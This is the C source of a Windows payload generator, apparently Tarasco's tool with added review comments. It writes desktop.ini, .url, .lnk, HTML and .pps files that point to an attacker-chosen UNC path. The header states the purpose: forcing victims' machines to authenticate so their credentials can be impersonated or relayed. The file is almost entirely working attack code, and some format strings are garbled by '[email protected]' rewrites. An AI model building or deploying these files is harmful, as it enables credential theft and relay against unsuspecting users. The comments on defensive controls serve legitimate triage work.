C:/Web/payload/payload.c

00001 /*
00002 Payload generator. Creates content that will force remote users to connect to the target network resource.
00003 If pointing to a network pipe ( \\hostname\pipe\mypipe ) user credentials can be impersonated.
00004 You can also point to a remote network share to force the computer that handles the payload to authenticate against
00005 the remote host. Then you can play with your favorite smbrelay/cain/misc sniffer
00006 
00007 For more information: http://www.tarasco.org/payload/index.html
00008 Author: Andres Tarasco - (c) 2006-2008
00009 
00010 Destination could be something like:
00011 
00012 * \\hostname\admin$
00013 * \\hostname\pipe\mypipe
00014 
00015 */
00016 #define _CRT_SECURE_NO_DEPRECATE
00017 #include <io.h>
00018 #include <stdio.h>
00019 #include <sys/stat.h>
00020 #include <windows.h>
00021 
00022 void           usage(void);
00023 void           banner(void);
00024 
00025 /*********************************************************************************/
00026 
/* Print the tool's name, author and home page to stdout, followed by a blank line. */
void banner(void)
{
        static const char *const lines[] = {
                "Force Network connections - payload generation\n",
                "Author: Andres Tarasco Acuna - (c) 2007-2008\n",
                "URL: http://www.tarasco.org\n\n"
        };
        size_t k;

        for (k = 0; k < sizeof lines / sizeof lines[0]; k++) {
                fputs(lines[k], stdout);
        }
}
00033 
/* Print the command-line synopsis to stdout: -t type, -d destination, -p output path. */
void usage(void)
{
        fputs("usage:\n", stdout);
        fputs("payload.exe -t [d0|d1|d2|d3|d4|u|l|h|o] -d destination -p path\n", stdout);
}
00038 /*********************************************************************************/
00039 
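/* Sizes used when assembling the .lnk output. */
enum {
        LNK_HEADER_SIZE = 76,                    /* size of the fixed header block */
        LNK_TAIL_SIZE   = 512,                   /* scratch area that follows the header */
        LNK_MAX_DEST    = (LNK_TAIL_SIZE - 6) / 2 /* 2 length bytes + 2 bytes per char + 4 zero bytes */
};

/*
 * Append `name` to the NUL-terminated string in `path` (capacity `cap` bytes).
 * Returns 0 on success; prints a message and returns -1 if the result would not fit.
 */
static int append_name(char *path, size_t cap, const char *name)
{
        if (strlen(path) + strlen(name) >= cap) {
                fprintf(stderr, "output path too long\n");
                return -1;
        }
        strcat(path, name);
        return 0;
}

/*
 * Create (or truncate) `file` and write `len` bytes from `data` into it.
 * Returns 0 on success, -1 if the file could not be created or was not fully written.
 */
static int write_payload(const char *file, const void *data, DWORD len)
{
        DWORD written = 0;
        BOOL ok;
        HANDLE out = CreateFile(file, GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE,
                                NULL, CREATE_ALWAYS, 0, NULL);

        if (out == INVALID_HANDLE_VALUE) {
                fprintf(stderr, "cannot create %s (error %lu)\n", file, (unsigned long)GetLastError());
                return -1;
        }
        ok = WriteFile(out, data, len, &written, NULL) && written == len;
        CloseHandle(out);
        if (!ok) {
                fprintf(stderr, "short or failed write to %s\n", file);
                return -1;
        }
        return 0;
}

/*
 * Entry point. Reads -t <type>, -d <destination> and -p <path> from the command
 * line and writes one file (desktop.ini, payload.url, payload.lnk, payload.html
 * or payload.pps) under <path> whose content references <destination>.
 *
 * Returns 0 when the file was written, 1 on a usage error, an over-long
 * argument or an I/O failure.
 *
 * Review notes:
 *  - Every argument is length-checked before it is copied; the original used
 *    unbounded strcpy/strcat/sprintf into fixed stack buffers and read
 *    argv[i+1] without checking argc.
 *  - The generated files are the artefacts to look for when triaging: shell
 *    metadata (desktop.ini, .url, .lnk) or HTML whose icon/stylesheet reference
 *    is a UNC path. Per the file header, that reference makes the viewing host
 *    authenticate to the named server; filtering outbound SMB and restricting
 *    outgoing NTLM are the usual controls.
 *  - NOTE(review): the "[email protected]" fragments in the format strings are
 *    not valid key names and appear to be the hosting site's e-mail obfuscation
 *    rewriting the original text; they are reproduced unchanged.
 */
int main(int argc, char **argv)
{
        /* 76-byte fixed header written at the start of payload.lnk; its first
           dword (0x4C) equals the header length. */
        unsigned char IconHeader[LNK_HEADER_SIZE] = {
                0x4C, 0x00, 0x00, 0x00, 0x01, 0x14, 0x02, 0x00,
                0x00, 0x00, 0x00, 0x00, 0xC0, 0x00, 0x00, 0x00,
                0x00, 0x00, 0x00, 0x46, 0xC0, 0x00, 0x00, 0x00,
                0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
                0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                0x00, 0x00, 0x00, 0x00
        };
        const char *type = "";          /* was uninitialised: dereferenced when -t was absent */
        char destination[512] = "";
        char path[512] = ".";
        char exploitcode[4096];
        int written = 0;                /* snprintf result for the text formats */
        int rc = 0;
        int i;

        banner();

        /* Parse parameters: options come in "<switch> <value>" pairs. */
        for (i = 1; i < argc; i += 2) {
                /* argv[i][1] is only readable when argv[i] is not the empty string. */
                const char flag = (argv[i][0] != '\0') ? argv[i][1] : '\0';
                const char *value = (i + 1 < argc) ? argv[i + 1] : NULL;

                if (flag != 't' && flag != 'd' && flag != 'p') {
                        continue;       /* unknown switches are skipped together with their value */
                }
                if (value == NULL) {    /* switch given as the last argument, no value */
                        usage();
                        exit(1);
                }
                switch (flag) {
                case 't':
                        type = value;
                        break;
                case 'd':
                        if (strlen(value) >= sizeof destination) {
                                fprintf(stderr, "destination too long (max %u characters)\n",
                                        (unsigned)(sizeof destination - 1));
                                return 1;
                        }
                        strcpy(destination, value);
                        printf("destination: %s\n", destination);
                        break;
                case 'p':
                        if (strlen(value) >= sizeof path) {
                                fprintf(stderr, "output path too long\n");
                                return 1;
                        }
                        strcpy(path, value);
                        break;
                }
        }
        if ((*destination == '\0') || (*type == '\0')) {
                usage();
                exit(1);
        }

        if (*path != '.')
        {
                /* Best effort: the directory may already exist, so the result is ignored. */
                _mkdir(path);
        }

        switch (type[0]) /* [d0|d1|d2|d3|d4|u|l|h|o] */
        {
        case 'd': /* DESKTOP.INI */
                switch (type[1])
                {
                case '0':
                        written = snprintf(exploitcode, sizeof exploitcode,
                                "[.ShellClassInfo]\r\nInfoTip=Proof_Of_Concept_Exploit0\r\n"
                                "IconFile=%s\r\nIconIndex=-666\r\n"
                                "[email protected]%s,-1\r\n"
                                "[email protected]%s,-1\r\n"
                                "[email protected]%s,-1\r\n"
                                "ConfirmFileOp=0\r\n", destination, destination, destination, destination);
                        break;

                case '1': /* IconFile parameter */
                        /* Triggered when a subfolder is accessed. */
                        written = snprintf(exploitcode, sizeof exploitcode,
                                "[.ShellClassInfo]\r\nInfoTip=Proof_Of_Concept_Exploit0\r\nIconFile=%s\r\nIconIndex=-666\r\nConfirmFileOp=0\r\n", destination);
                        break;
                case '2':
                        /* Triggered when left in a subfolder. Also works with USB drives. */
                        written = snprintf(exploitcode, sizeof exploitcode,
                                "[.ShellClassInfo]\r\nInfoTip=Proof_Of_Concept_Exploit1\r\[email protected]%s,-1\r\nIconIndex=-666\r\nConfirmFileOp=0\r\n", destination);
                        break;
                case '3': /* InfoTip */
                        /* Triggered when the folder is selected. */
                        /* When left in the root of a USB disk the pipe is loaded. */
                        written = snprintf(exploitcode, sizeof exploitcode,
                                "[.ShellClassInfo]\r\[email protected]%s,-1\r\nIconIndex=-666\r\nConfirmFileOp=0\r\n", destination);
                        break;
                case '4': /* desktop.ini */
                        /* Triggered when entering the folder. */
                        written = snprintf(exploitcode, sizeof exploitcode,
                                "[LocalizedFileNames]\r\[email protected]%s,-1\r\n", destination);
                        break;
                default:
                        usage();
                        exit(1);
                        break;
                }
                if (written < 0 || (size_t)written >= sizeof exploitcode) {
                        fprintf(stderr, "generated content does not fit the output buffer\n");
                        return 1;
                }
                if (append_name(path, sizeof path, "\\desktop.ini") != 0) {
                        return 1;
                }
                printf("Opening: %s\n", path);
                rc = write_payload(path, exploitcode, (DWORD)strlen(exploitcode));
                break;

        case 'u': /* URL FILE */
                if (append_name(path, sizeof path, "\\payload.url") != 0) {
                        return 1;
                }
                written = snprintf(exploitcode, sizeof exploitcode,
                        "[DEFAULT]\r\n"
                        "BASEURL=http://www.tarasco.org\r\n"
                        "[InternetShortcut]\r\n"
                        "URL=http://www.tarasco.org\r\n"
                        "Modified=203BF2701D7FC60120\r\n"
                        "IconIndex=3\r\n"
                        "IconFile=%s\r\n", destination);
                if (written < 0 || (size_t)written >= sizeof exploitcode) {
                        fprintf(stderr, "generated content does not fit the output buffer\n");
                        return 1;
                }
                rc = write_payload(path, exploitcode, (DWORD)strlen(exploitcode));
                break;

        case 'l': /* LNK FILE - For more information http://www.514.es/html/forensic */
        {
                unsigned char lnk[LNK_HEADER_SIZE + LNK_TAIL_SIZE];
                unsigned char *tail = lnk + LNK_HEADER_SIZE;
                size_t len = strlen(destination);
                size_t k;

                /* The original expanded up to 511 characters into a 512-byte
                   buffer at two bytes each and stored the length in one char;
                   anything above LNK_MAX_DEST overran the stack. */
                if (len > LNK_MAX_DEST) {
                        fprintf(stderr, "destination too long for -t l (max %d characters)\n",
                                (int)LNK_MAX_DEST);
                        return 1;
                }
                if (append_name(path, sizeof path, "\\payload.lnk") != 0) {
                        return 1;
                }
                printf("Opening: %s\n", path);

                memcpy(lnk, IconHeader, LNK_HEADER_SIZE);
                memset(tail, 0, LNK_TAIL_SIZE);
                tail[0] = (unsigned char)len;   /* length byte, then a zero byte */
                for (k = 0; k < len; k++) {
                        /* each character is followed by a zero byte */
                        tail[k * 2 + 2] = (unsigned char)destination[k];
                }
                rc = write_payload(path, lnk, (DWORD)(LNK_HEADER_SIZE + len * 2 + 6));
                break;
        }

        case 'h': /* http://www.w3.org/TR/html4/struct/links.html#h-12.3 */
                if (append_name(path, sizeof path, "\\payload.html") != 0) {
                        return 1;
                }
                printf("Abriendo fichero: %s\n", path);
                written = snprintf(exploitcode, sizeof exploitcode,
                        "<html><head></head>\r\n"
                        "<LINK REL=\"stylesheet\" HREF=\"res://%s\" type=\"text/css\">\r\n</html>", destination);
                if (written < 0 || (size_t)written >= sizeof exploitcode) {
                        fprintf(stderr, "generated content does not fit the output buffer\n");
                        return 1;
                }
                rc = write_payload(path, exploitcode, (DWORD)strlen(exploitcode));
                break;

        case 'o': /* PPS/DOC/XLS/XLD/DOT/RTF */
                if (append_name(path, sizeof path, "\\payload.pps") != 0) {
                        return 1;
                }
                printf("Abriendo fichero: %s\n", path);
                written = snprintf(exploitcode, sizeof exploitcode,
                        "<html><head></head>\r\n"
                        "<LINK REL=\"stylesheet\" HREF=\"file://%s\" type=\"text/css\">\r\n"
                        "<b>Pr00f 0f c0nc3p7</b></html>", destination);
                if (written < 0 || (size_t)written >= sizeof exploitcode) {
                        fprintf(stderr, "generated content does not fit the output buffer\n");
                        return 1;
                }
                rc = write_payload(path, exploitcode, (DWORD)strlen(exploitcode));
                break;

        default:
                /* %s, not %i: `type` is a string; passing a pointer for %i is undefined. */
                printf("[+] Unknown parameter -t %s\n", type);
                exit(1);
                break;
        }

        return rc == 0 ? 0 : 1;
}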
00210 /*********************************************************************************/